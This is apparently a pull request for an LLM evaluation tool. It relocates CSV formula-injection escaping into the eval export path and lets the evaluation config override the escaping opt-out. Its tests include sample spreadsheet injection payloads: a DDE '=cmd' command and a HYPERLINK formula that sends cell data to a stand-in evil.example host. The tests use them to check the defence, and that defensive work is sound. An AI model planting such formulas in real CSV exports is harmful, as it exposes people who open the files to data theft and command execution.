### PR TITLE
fix(eval): restore CSV export architecture boundary

### DIFF
--- a/src/csv.ts
+++ b/src/csv.ts
@@ -310,9 +310,9 @@ export function testCaseFromCsvRow(row: CsvRow): TestCase {
 export function serializeObjectArrayAsCSV(vars: object[]): string {
   invariant(vars.length > 0, 'No variables to serialize');
   const columnNames = Object.keys(vars[0]).join(',');
-  // NOTE: values here are intentionally NOT formula-escaped (see escapeCsvFormula).
-  // This output is a generated test-case dataset meant to be re-imported via the
-  // CSV test loader, and prefixing a cell would corrupt vars on round-trip.
+  // This generated test-case dataset is intentionally not formula-escaped because
+  // prefixing a cell would corrupt vars on round-trip. Formula escaping is applied
+  // only by the eval result export path.
   const rows = vars
     .map(
       (result) =>
@@ -322,51 +322,4 @@ export function serializeObjectArrayAsCSV(vars: object[]): string {
     )
     .join('\n');
   return [columnNames, rows].join('\n') + '\n';
-}
-
-function isNumericCell(value: string): boolean {
-  // Only finite numbers are safe to leave unescaped — `Number('-Infinity')` is a
-  // valid (non-NaN) number, so guard with isFinite so "-Infinity"/"+Infinity"
-  // (and overflow like "-1e400") are still treated as formula triggers.
-  return value.trim() !== '' && Number.isFinite(Number(value));
-}
-
-/**
- * Neutralize spreadsheet formula (CSV) injection — CWE-1236, OWASP "CSV Injection".
- *
- * Excel, Google Sheets and LibreOffice execute a cell as a formula when its text
- * begins with `=`, `+`, `-`, `@`, a TAB or a carriage return. promptfoo's exported
- * eval/redteam results contain model output, test vars and grader comments —
- * attacker-influenced, especially under red teaming — so an exported CSV opened in
- * a spreadsheet could run code, exfiltrate data, or phish via a hyperlink.
- * csv-stringify's quoting does NOT prevent this; the cell value itself must be
- * prefixed.
- *
- * We prepend a single apostrophe, the spreadsheet-native "treat the rest as text"
- * marker (it is not shown in the cell). To stay minimally disruptive we only touch
- * genuinely dangerous values: a leading `-`/`+` on an otherwise-numeric value
- * (e.g. "-5", "+3.14", a score) is left alone because spreadsheets read those as
- * numbers, not formulas. Empty strings are returned unchanged.
- *
- * Apply this only at export time. promptfoo's CSV import path and any user-authored
- * CSVs must never be mutated, so round-trips stay lossless.
- */
-export function escapeCsvFormula(value: string): string {
-  if (value.length === 0) {
-    return value;
-  }
-  // Spreadsheets strip leading whitespace AND zero-width characters before parsing,
-  // so inspect the first visible character after removing both (this also covers
-  // leading TAB / CR obfuscation). JS `\s` already covers BOM/NBSP but misses the
-  // zero-width space/non-joiner/joiner (U+200B–U+200D), so strip those explicitly.
-  const unpadded = value.replace(/^[\s\u200B\u200C\u200D]+/, '');
-  const firstChar = unpadded[0];
-  if (firstChar === undefined) {
-    return value;
-  }
-  const isFormulaTrigger =
-    firstChar === '=' ||
-    firstChar === '@' ||
-    ((firstChar === '-' || firstChar === '+') && !isNumericCell(unpadded));
-  return isFormulaTrigger ? `'${value}` : value;
 }

--- a/src/util/eval/evalTableUtils.ts
+++ b/src/util/eval/evalTableUtils.ts
@@ -4,6 +4,7 @@ import { ResultFailureReason } from '../../types/index';
 import type Eval from '../../models/eval';
 import type {
   CompletedPrompt,
+  EnvOverrides,
   EvalResultsFilterMode,
   EvalTableDTO,
   EvaluateTableRow,
@@ -37,6 +38,14 @@ export interface GenerateEvalCsvOptions {
    * If not provided, comparison exports will throw an error.
    */
   findEvalById?: (id: string) => Promise<Eval | null | undefined>;
+}
+
+/** Options shared by direct table-to-CSV exports. */
+export interface EvalTableCsvOptions {
+  /** Whether to include redteam metadata columns. */
+  isRedteam?: boolean;
+  /** Evaluation-level environment overrides, which take precedence over process.env. */
+  env?: EnvOverrides;
 }
 
 /**
@@ -444,11 +453,16 @@ export function tableRowToCsvValues(
  */
 function escapeCsvRowsForFormulaInjection(
   rows: (string | number | boolean)[][],
+  env?: EnvOverrides,
 ): (string | number | boolean)[][] {
-  // Keep this process-level opt-out local to the node-layer export path so CSV
-  // serialization does not add another dependency on the legacy runtime layer.
+  // Resolve the persisted evaluation config before process.env, matching the
+  // environment precedence used by the rest of promptfoo without importing the
+  // legacy runtime environment module into this node-layer export path.
+  const configuredValue =
+    env?.PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING ??
+    process.env.PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING;
   const disableEscaping = ['1', 'true', 'yes', 'yup', 'yeppers'].includes(
-    process.env.PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING?.toLowerCase() ?? '',
+    configuredValue?.toLowerCase() ?? '',
   );
   if (disableEscaping) {
     return rows;
@@ -516,9 +530,9 @@ export function escapeCsvFormula(value: string): string {
  */
 export function evalTableToCsv(
   table: { head: { prompts: Prompt[]; vars: string[] }; body: EvaluateTableRow[] },
-  options: { isRedteam?: boolean } = { isRedteam: false },
+  options: EvalTableCsvOptions = {},
 ): string {
-  const { isRedteam } = options;
+  const { env, isRedteam = false } = options;
   const hasDescriptions = table.body.some((row) => row.test.description);
 
   const namedScoreNamesByPrompt = collectNamedScoreNamesByPrompt(table);
@@ -535,7 +549,7 @@ export function evalTableToCsv(
     ),
   ];
 
-  return csvStringify(escapeCsvRowsForFormulaInjection(csvRows));
+  return csvStringify(escapeCsvRowsForFormulaInjection(csvRows, env));
 }
 
 /**
@@ -720,6 +734,7 @@ export async function generateEvalCsv(
   }
 
   return evalTableToCsv(finalTable, {
+    env: eval_.config.env,
     isRedteam: Boolean(eval_.config.redteam),
   });
 }
@@ -748,6 +763,7 @@ export interface StreamCsvOptions {
  */
 export async function streamEvalCsv(eval_: Eval, options: StreamCsvOptions): Promise<void> {
   const { isRedteam = false, write } = options;
+  const env = eval_.config?.env;
   const varNames = eval_.vars;
   const prompts = eval_.prompts;
   const numPrompts = prompts.length;
@@ -792,7 +808,7 @@ export async function streamEvalCsv(eval_: Eval, options: StreamCsvOptions): Pro
     isRedteam,
     namedScoreNamesByPrompt,
   });
-  await write(csvStringify(escapeCsvRowsForFormulaInjection([headers])));
+  await write(csvStringify(escapeCsvRowsForFormulaInjection([headers], env)));
 
   for await (const batchResults of eval_.fetchResultsBatched()) {
     const rows = batchToStreamRows(batchResults, varNames, numPrompts);
@@ -805,7 +821,7 @@ export async function streamEvalCsv(eval_: Eval, options: StreamCsvOptions): Pro
     );
 
     if (csvRows.length > 0) {
-      await write(csvStringify(escapeCsvRowsForFormulaInjection(csvRows)));
+      await write(csvStringify(escapeCsvRowsForFormulaInjection(csvRows, env)));
     }
   }
 }

--- a/src/util/eval/evalTableUtils.ts
+++ b/src/util/eval/evalTableUtils.ts
@@ -1,6 +1,4 @@
 import { stringify as csvStringify } from 'csv-stringify/sync';
-import { escapeCsvFormula } from '../../csv';
-import { getEnvBool } from '../../envars';
 import { ResultFailureReason } from '../../types/index';
 
 import type Eval from '../../models/eval';
@@ -447,12 +445,51 @@ export function tableRowToCsvValues(
 function escapeCsvRowsForFormulaInjection(
   rows: (string | number | boolean)[][],
 ): (string | number | boolean)[][] {
-  if (getEnvBool('PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING')) {
+  // Keep this process-level opt-out local to the node-layer export path so CSV
+  // serialization does not add another dependency on the legacy runtime layer.
+  const disableEscaping = ['1', 'true', 'yes', 'yup', 'yeppers'].includes(
+    process.env.PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING?.toLowerCase() ?? '',
+  );
+  if (disableEscaping) {
     return rows;
   }
   return rows.map((row) =>
     row.map((cell) => (typeof cell === 'string' ? escapeCsvFormula(cell) : cell)),
   );
+}
+
+function isNumericCell(value: string): boolean {
+  return value.trim() !== '' && Number.isFinite(Number(value));
+}
+
+/**
+ * Neutralize spreadsheet formula (CSV) injection at eval export time (CWE-1236).
+ *
+ * Spreadsheet applications execute cells beginning with `=`, `+`, `-`, or `@`
+ * as formulas. Exported eval data can contain attacker-controlled model output,
+ * variables, and grader comments, and CSV quoting alone does not neutralize
+ * those formulas. Prefix dangerous values with the spreadsheet-native text
+ * marker while preserving finite signed numbers.
+ *
+ * Leading whitespace and zero-width characters are ignored when identifying a
+ * trigger because spreadsheet applications can strip them before evaluation.
+ */
+export function escapeCsvFormula(value: string): string {
+  if (value.length === 0) {
+    return value;
+  }
+
+  const unpadded = value.replace(/^[\s\u200B\u200C\u200D]+/, '');
+  const firstChar = unpadded[0];
+  if (firstChar === undefined) {
+    return value;
+  }
+
+  const isFormulaTrigger =
+    firstChar === '=' ||
+    firstChar === '@' ||
+    ((firstChar === '-' || firstChar === '+') && !isNumericCell(unpadded));
+  return isFormulaTrigger ? `'${value}` : value;
 }
 
 /**

--- a/test/csv.test.ts
+++ b/test/csv.test.ts
@@ -1,10 +1,5 @@
 import { afterEach, describe, expect, it, vi } from 'vitest';
-import {
-  assertionFromString,
-  escapeCsvFormula,
-  serializeObjectArrayAsCSV,
-  testCaseFromCsvRow,
-} from '../src/csv';
+import { assertionFromString, serializeObjectArrayAsCSV, testCaseFromCsvRow } from '../src/csv';
 import logger from '../src/logger';
 
 vi.mock('../src/logger', () => ({
@@ -762,82 +757,5 @@ describe('serializeObjectArrayAsCSV', () => {
     // Note: The actual implementation includes quotes around values and a trailing newline
     const expected = 'name,age\n"John","30"\n"Jane","25","NY"\n';
     expect(serializeObjectArrayAsCSV(vars)).toBe(expected);
-  });
-});
-
-describe('escapeCsvFormula', () => {
-  it.each([
-    ['=1+1', "'=1+1"],
-    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
-    ['@SUM(A1:A9)', "'@SUM(A1:A9)"],
-    ['+1+1', "'+1+1"],
-    ['-1+1', "'-1+1"],
-    ['-2+cmd', "'-2+cmd"],
-  ])('prefixes formula trigger %p -> %p', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    ['\t=danger', "'\t=danger"],
-    ['\r=danger', "'\r=danger"],
-    ['  =danger', "'  =danger"],
-    ['\t@SUM(A1)', "'\t@SUM(A1)"],
-    ['\r-1+1', "'\r-1+1"],
-    ['\n\t =evil', "'\n\t =evil"],
-  ])('treats leading whitespace/control before a trigger as a formula (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    // Zero-width chars are invisible to JS \s but stripped by spreadsheets before
-    // parsing, so a leading one must not hide a formula trigger (CWE-1236 bypass).
-    ['\u200B=1+1', "'\u200B=1+1"], // zero-width space
-    ['\u200C@SUM(A1)', "'\u200C@SUM(A1)"], // zero-width non-joiner
-    ['\u200D=cmd', "'\u200D=cmd"], // zero-width joiner
-  ])('escapes triggers hidden behind zero-width characters (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    // Number() treats these as valid numbers, but they are not finite numerals and
-    // must still be escaped so the -/+ numeric carve-out cannot be abused.
-    ['-Infinity', "'-Infinity"],
-    ['+Infinity', "'+Infinity"],
-    ['-1e400', "'-1e400"], // overflows to -Infinity
-  ])('escapes non-finite numeric-looking values (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    // Real-world payloads, to make the protection legible to reviewers.
-    [
-      '=HYPERLINK("https://evil.example?x="&A1,"click")',
-      '\'=HYPERLINK("https://evil.example?x="&A1,"click")',
-    ],
-    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
-  ])('neutralizes real exfiltration/command payloads (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    ['-5', '-5'],
-    ['-5.25', '-5.25'],
-    ['-1e3', '-1e3'],
-    ['+5', '+5'],
-    ['+3.14', '+3.14'],
-  ])('leaves legitimate numbers untouched (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
-  });
-
-  it.each([
-    ['hello world', 'hello world'],
-    ['5-3', '5-3'],
-    ['a=b', 'a=b'],
-    ['user@example.com', 'user@example.com'],
-    ['', ''],
-    ['   ', '   '],
-    ['\t\t', '\t\t'],
-  ])('leaves non-formula values untouched (%p)', (input, expected) => {
-    expect(escapeCsvFormula(input)).toBe(expected);
   });
 });

--- a/test/util/eval/evalTableUtils.test.ts
+++ b/test/util/eval/evalTableUtils.test.ts
@@ -2,6 +2,7 @@ import { parse as parseCsv } from 'csv-parse/sync';
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 import { ResultFailureReason } from '../../../src/types/index';
 import {
+  escapeCsvFormula,
   evalTableToCsv,
   evalTableToJson,
   getEvalTableOutputPromptLocationsBySize,
@@ -1835,6 +1836,78 @@ describe('evalTableUtils', () => {
       const bobP2Idx = bobLine!.indexOf('Bob-P2');
       expect(bobP1Idx).toBeLessThan(bobP2Idx);
     });
+  });
+});
+
+describe('escapeCsvFormula', () => {
+  it.each([
+    ['=1+1', "'=1+1"],
+    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
+    ['@SUM(A1:A9)', "'@SUM(A1:A9)"],
+    ['+1+1', "'+1+1"],
+    ['-1+1', "'-1+1"],
+    ['-2+cmd', "'-2+cmd"],
+  ])('prefixes formula trigger %p -> %p', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['\t=danger', "'\t=danger"],
+    ['\r=danger', "'\r=danger"],
+    ['  =danger', "'  =danger"],
+    ['\t@SUM(A1)', "'\t@SUM(A1)"],
+    ['\r-1+1', "'\r-1+1"],
+    ['\n\t =evil', "'\n\t =evil"],
+  ])('treats leading whitespace/control before a trigger as a formula (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['\u200B=1+1', "'\u200B=1+1"],
+    ['\u200C@SUM(A1)', "'\u200C@SUM(A1)"],
+    ['\u200D=cmd', "'\u200D=cmd"],
+  ])('escapes triggers hidden behind zero-width characters (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['-Infinity', "'-Infinity"],
+    ['+Infinity', "'+Infinity"],
+    ['-1e400', "'-1e400"],
+  ])('escapes non-finite numeric-looking values (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    [
+      '=HYPERLINK("https://evil.example?x="&A1,"click")',
+      '\'=HYPERLINK("https://evil.example?x="&A1,"click")',
+    ],
+    ["=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"],
+  ])('neutralizes real exfiltration/command payloads (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['-5', '-5'],
+    ['-5.25', '-5.25'],
+    ['-1e3', '-1e3'],
+    ['+5', '+5'],
+    ['+3.14', '+3.14'],
+  ])('leaves legitimate numbers untouched (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
+  });
+
+  it.each([
+    ['hello world', 'hello world'],
+    ['5-3', '5-3'],
+    ['a=b', 'a=b'],
+    ['user@example.com', 'user@example.com'],
+    ['', ''],
+    ['   ', '   '],
+    ['\t\t', '\t\t'],
+  ])('leaves non-formula values untouched (%p)', (input, expected) => {
+    expect(escapeCsvFormula(input)).toBe(expected);
   });
 });
 

--- a/test/util/eval/evalTableUtils.test.ts
+++ b/test/util/eval/evalTableUtils.test.ts
@@ -5,6 +5,7 @@ import {
   escapeCsvFormula,
   evalTableToCsv,
   evalTableToJson,
+  generateEvalCsv,
   getEvalTableOutputPromptLocationsBySize,
   getEvalTablePromptStrippedPayload,
   STRIPPED_TABLE_CELL_PROMPT,
@@ -1958,6 +1959,68 @@ describe('evalTableToCsv formula injection (CWE-1236)', () => {
     } finally {
       vi.unstubAllEnvs();
     }
+  });
+
+  it('uses the evaluation config env before process.env', () => {
+    vi.stubEnv('PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING', 'true');
+    try {
+      const [, dataRow] = parseCsv(
+        evalTableToCsv(buildFormulaTable(), {
+          env: { PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING: 'false' },
+        }),
+      ) as string[][];
+
+      expect(dataRow[1]).toBe("'=cmd|calc");
+      expect(dataRow[2]).toBe('\'=HYPERLINK("http://evil.example","click")');
+    } finally {
+      vi.unstubAllEnvs();
+    }
+  });
+
+  it('uses config.env for full-table evaluation exports', async () => {
+    const csv = await generateEvalCsv({
+      config: { env: { PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING: 'true' } },
+      getTablePage: vi.fn().mockResolvedValue(buildFormulaTable()),
+    } as unknown as Eval);
+    const [, dataRow] = parseCsv(csv) as string[][];
+
+    expect(dataRow[1]).toBe('=cmd|calc');
+    expect(dataRow[2]).toBe('=HYPERLINK("http://evil.example","click")');
+  });
+
+  it('uses config.env for streaming evaluation exports', async () => {
+    const mockEval = {
+      config: { env: { PROMPTFOO_DISABLE_CSV_FORMULA_ESCAPING: 'true' } },
+      vars: ['input'],
+      prompts: [createCompletedPrompt('{{input}}', { provider: 'echo', label: 'Prompt 1' })],
+      fetchResultsBatched: async function* () {
+        yield [
+          {
+            testIdx: 0,
+            promptIdx: 0,
+            testCase: { vars: { input: '=cmd|calc' }, description: '=danger' },
+            response: { output: '=HYPERLINK("http://evil.example","click")' },
+            success: false,
+            score: 0,
+            namedScores: {},
+            failureReason: ResultFailureReason.ASSERT,
+            gradingResult: { pass: false, reason: '@SUM(A1)', comment: 'plain comment' },
+            metadata: {},
+          },
+        ];
+      },
+    } as unknown as Eval;
+    const chunks: string[] = [];
+
+    await streamEvalCsv(mockEval, {
+      write: (data) => {
+        chunks.push(data);
+      },
+    });
+    const [, dataRow] = parseCsv(chunks.join('')) as string[][];
+
+    expect(dataRow[1]).toBe('=cmd|calc');
+    expect(dataRow[2]).toBe('=HYPERLINK("http://evil.example","click")');
   });
 
   it('escapes formula triggers in header cells (var name and bare prompt label)', () => {


### PR DESCRIPTION
## Summary

- co-locate CSV formula escaping with eval result serialization
- remove the two new `node -> legacy-runtime` imports introduced by the CSV formula-injection fix
- preserve formula-injection protection, including the process-level opt-out and its accepted truthy values

## Why

The default-branch Style Check began failing after #9609 because
`src/util/eval/evalTableUtils.ts` added imports from `src/csv.ts` and
`src/envars.ts`. That widened the architecture ratchet from 150 to 152
`node -> legacy-runtime` imports.

The architecture checker is the regression guard: it failed on current `main`
and passes with this change without updating the dependency baseline.

## Validation

- `npm run architecture:check`
- `npx vitest run test/csv.test.ts test/util/eval/evalTableUtils.test.ts --sequence.shuffle=false`
- `npm run tsc`
- `npm run build`
- `npm run l`
- `npm run f`
- local echo-provider eval exported to CSV with `--no-cache`; parsed output retained the leading apostrophe on formula payloads
